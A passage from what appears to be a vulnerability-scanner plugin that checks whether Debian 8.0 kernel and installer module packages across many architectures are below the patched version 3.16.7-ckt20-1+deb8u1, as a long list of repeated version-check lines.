reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"crypto-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"dasd-extra-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"dasd-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"efi-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"efi-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"efi-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"efi-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"event-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ext4-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fancontrol-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fancontrol-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fat-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fb-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fb-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fb-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fb-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fb-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firewire-core-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firewire-core-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firewire-core-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firewire-core-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firewire-core-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firewire-core-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firewire-core-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firewire-core-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firewire-core-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"fuse-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hfs-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hfs-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hfs-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hfs-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hfs-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hfs-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hfs-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hfs-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hyperv-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hyperv-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hyperv-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hypervisor-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"hypervisor-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"i2c-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"i2c-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"i2c-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"i2c-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"i2c-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"input-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ipv6-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"isofs-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jffs2-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"jfs-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"kernel-image-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"leds-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-arm\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-s390\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-x86\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-3.16\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-4kc-malta\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", 